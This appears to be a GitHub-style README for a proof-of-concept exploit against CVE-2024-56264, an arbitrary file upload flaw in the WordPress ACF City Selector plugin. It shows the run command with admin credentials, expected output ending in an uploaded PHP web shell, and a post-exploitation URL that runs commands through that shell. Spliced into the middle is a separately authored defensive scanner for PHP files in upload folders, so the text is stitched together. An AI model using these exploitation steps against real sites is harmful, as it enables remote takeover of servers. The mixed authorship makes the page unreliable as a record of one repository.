
CVE-2024-56264 PoC — WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

Associated Vulnerability
Title: WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability (CVE-2024-56264)
Description: Unrestricted Upload of File with Dangerous Type vulnerability in Beee ACF City Selector acf-city-selector allows Upload a Web Shell to a Web Server. This issue affects ACF City Selector: from n/a through <= 1.14.0.
Readme
# CVE-2024-56264

## WordPress ACF City Selector - Arbitrary File Upload Exploit (CVE-2024-56264)

### Overview
This repository contains an exploit for **CVE-2024-56264**, which is an **Arbitrary File Upload** vulnerability found in the WordPress **ACF City Selector** plugin (versions **<= 1.14.0**). This vulnerability allows an attacker to upload a **malicious PHP file (web shell)** to a vulnerable WordPress instance and execute arbitrary commands on the server.

### CVE Details
- **CVE ID:** CVE-2024-56264
- **Published Date:** January 2, 2025
- **Affected Plugin:** ACF City Selector
- **Vulnerable Versions:** `<= 1.14.0`
- **Impact:** Remote Code Execution (RCE) via unrestricted file upload

### Description
The ACF City Selector plugin fails to properly validate uploaded files, allowing attackers to **bypass restrictions** and upload **arbitrary PHP files**. Once a malicious PHP file is uploaded, an attacker can execute system commands remotely, leading to **full server compromise**.
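The defensive counterpart to the description above, added here as an example and not code from this repository or from the plugin: a Python scanner that walks a WordPress uploads tree (for instance `wp-content/uploads`, which contains the `acfcs/` folder the page names) and reports files that an uploads directory should never hold: anything carrying a PHP-executable suffix anywhere in its name (so `q.php` and `shell.php.png` both count), anything whose content contains a PHP open tag regardless of extension, and anything outside a small extension allow-list. The executable-suffix set and the allow-list are assumptions for the example and should be tuned to the site's handler mapping and the file types it actually accepts.

```python
"""Defensive check for CVE-2024-56264-style uploads: walk a WordPress uploads
tree and report files that a media/CSV upload directory should never contain.
Added example; it is not code from the exploit repository or the plugin."""
from __future__ import annotations

import os
import re
import sys
from pathlib import Path

# Suffixes that mod_php / PHP-FPM will typically execute (assumption: adjust to
# the handler mapping of the web server you actually run).
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}

# Suffixes a WordPress uploads directory (including the plugin's acfcs/ folder,
# which holds imported city lists) might legitimately contain. Assumption for
# the example: tighten it to what your site really uses.
ALLOWED_EXTENSIONS = {".csv", ".txt", ".png", ".jpg", ".jpeg", ".gif", ".webp", ".pdf"}

# A PHP open tag anywhere in the file head, whatever the extension claims.
# "<?xml" (SVG, XML) deliberately does not match.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def all_extensions(name: str) -> set[str]:
    """Every dotted suffix of a filename, lower-cased, so that double-extension
    names such as 'shell.php.png' are caught as well as plain 'q.php'."""
    parts = name.lower().split(".")
    return {"." + p for p in parts[1:] if p}


def classify_file(name: str, head: bytes) -> str | None:
    """Return a finding label for a suspicious upload, or None if it looks benign.
    `head` is the first few KiB of the file's content."""
    exts = all_extensions(name)
    if exts & EXECUTABLE_EXTENSIONS:
        return "executable-extension"
    if PHP_OPEN_TAG.search(head):
        return "php-code-in-non-php-file"
    # Only the final suffix decides the allow-list check; a dotfile such as
    # ".htaccess" or a suffix-less file never passes it.
    last = "." + name.lower().rsplit(".", 1)[-1] if "." in name else ""
    if last not in ALLOWED_EXTENSIONS:
        return "extension-not-on-allow-list"
    return None


def scan_uploads(root: str | os.PathLike, head_bytes: int = 8192) -> list[tuple[str, str]]:
    """Walk `root` and return (relative_posix_path, finding) pairs for suspicious files."""
    root = Path(root)
    findings: list[tuple[str, str]] = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        with path.open("rb") as fh:
            head = fh.read(head_bytes)
        finding = classify_file(path.name, head)
        if finding is not None:
            findings.append((path.relative_to(root).as_posix(), finding))
    return findings


if __name__ == "__main__":
    # Usage: python scan_uploads.py /var/www/html/wp-content/uploads
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, finding in scan_uploads(target):
        print(f"[!] {finding}: {rel}")
```

Run it against `wp-content/uploads` on the server or on a backup; an executable-extension hit under `acfcs/` is exactly the artifact the README's expected output describes. Treat every report as a finding to triage rather than something to delete blindly, since the allow-list will also catch legitimate but unusual file types. The scan is detection only: the fix is updating the plugin past 1.14.0, and the defence in depth is a web-server rule that refuses to execute PHP beneath the uploads directory (for Apache, `php_admin_flag engine off` in a directory block; for nginx, a `location` that returns 403 for `.php` under `/uploads/`), so that a file which slips past validation still cannot run.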



## Requirements

### 📌 Dependencies
Ensure the following are installed before running the script:

- **Python 3.x**
- `requests` module (Install using: `pip install requests`)

You can install all required dependencies using:
```sh
pip install -r requirements.txt
```

## 🚀 Usage
Running the exploit:

```
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

```
### Example:
```
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
```
## Expected Output
Upon successful exploitation, you should see:
```
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
```


### Post-Exploitation
If successful, access the uploaded shell via:
```
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
```
This allows remote command execution on the server.

## ⚠ Disclaimer
This script is intended **only for educational and authorized security testing purposes**. **Unauthorized use is illegal** and may result in severe consequences. The author is **not responsible** for any misuse of this exploit.